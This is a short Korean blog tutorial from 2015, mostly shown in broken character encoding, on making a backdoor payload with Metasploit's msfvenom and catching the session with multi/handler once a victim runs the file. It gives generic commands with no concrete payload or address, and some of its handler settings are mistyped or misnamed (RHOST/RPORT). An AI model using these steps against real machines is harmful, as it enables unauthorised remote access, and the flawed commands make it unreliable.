Metasploit

msfvenom

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 12. 6.
728x90
๋ฐ˜์‘ํ˜•

์ฃผ์˜! ๋ชจ๋“  ์•…์˜์ ์ธ ๋ฒ•์  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค.


ํ ... ์˜›๋‚ ์—๋Š” msfpayload ๋ผ๋Š” ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฐฑ๋„์–ด๋„ ๋งŒ๋“ค์–ด ๋ณด๊ณ  ํ–ˆ๋‹ค.

๊ทธ๋Ÿฌ๋‚˜ ๋ฐ”๋ผ๊ณ  ๋‚œ ํ›„ ์˜ค๋žœ๋งŒ์— ์จ์•ผํ•ด์„œ ๋ช…๋ น์–ด๋ฅผ ํ•˜๋‹ˆ msfpayload๊ฐ€ ์—†๋ฐ์—ฌ,,,

๊ฒ€์ƒ‰๊ฒฐ๊ณผ msfvenom ์œผ๋กœ ๋ฐ”๊ผˆ๊ธธ๋ž˜ ๋‹ค์‹œ ๊ณต๋ถ€๋ฅผ ํ•˜์˜€๋‹ค.


์ด์ œ ์ด๋ฅผ ๊ฐ„๋‹จํžˆ ์‚ฌ์šฉํ•ด๋ณด์ž!

๋จผ์ € ๋ฆฌ์ŠคํŠธ๋ฅผ ๋ณด๊ธฐ์œ„ํ•ด


1. msfvenom -l




์ด๋ ‡๊ฒŒ ๋ฆฌ์ŠคํŠธ๊ฐ€ ๋‚˜์˜จ๋‹ค.


๋งŒ์•ฝ ์ž๊ธฐ๊ฐ€ ์“ฐ๊ณ  ์‹ถ์€ payload๋ฅผ ์ฐพ์•˜๋‹ค๋ฉด 


2. msfvenom -p ์›ํ•˜๋Š” payload -f ํ™•์žฅ์ž > ํŒŒ์ผ์ด๋ฆ„.ํ™•์žฅ์ž





root ํด๋”์— ๊ฐ€๋ฉด ํŒŒ์ผ์ด ์ƒ์„ฑ๋˜์–ด์žˆ๋‹ค.


์ด์   ํ•ธ๋“ค๋Ÿฌ๋ฅผ ํ–ฅํ•ด!!


1. msfconsole


2. use exploit/multi/handler



3. sey payload [payload ๋ช…]




4. set RHOST [payload ๋งŒ๋“ค๋•Œ ๋„ฃ์€ IP] 

5. set RPORT [payload ๋งŒ๋“ค๋•Œ ๋„ฃ์€ PORT]



6. set ExitOnsession false



7. exploit -j -z 




ํ”ผํ•ด์ž ์ปดํ“จํ„ฐ์—์„œ ํ”„๋กœ๊ทธ๋žจ์„ ์‹คํ–‰์‹œํ‚ค๋ฉด 



์ด๋ ‡๊ฒŒ ๋œฌ๋‹ค


๊ทธํ›„ ์—”ํ„ฐ 


๋‹ค์‹œ  sessions -i 1 ์„ ์ž…๋ ฅํ•˜๋ฉด




์•„์ง ์นผ๋ฆฌ์—์„œ ์œˆ๋„์šฐ 10์„ ์ธ์‹์„ ๋ชปํ•˜๋Š” ๊ฒƒ ๊ฐ™๋‹ค.

728x90
๋ฐ˜์‘ํ˜•

'Metasploit' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

stagefright.py  (0) 2016.02.10
postgreSQL?  (0) 2015.12.14
msf ์ด์šฉํ•˜๊ธฐ // beEF ์‚ฌ์šฉ๋ฒ•  (0) 2015.12.06
Arp Spoofing & DNS Spoofing  (0) 2015.12.06
msf ์ด์šฉํ•˜๊ธฐ2  (0) 2015.12.02

๋Œ“๊ธ€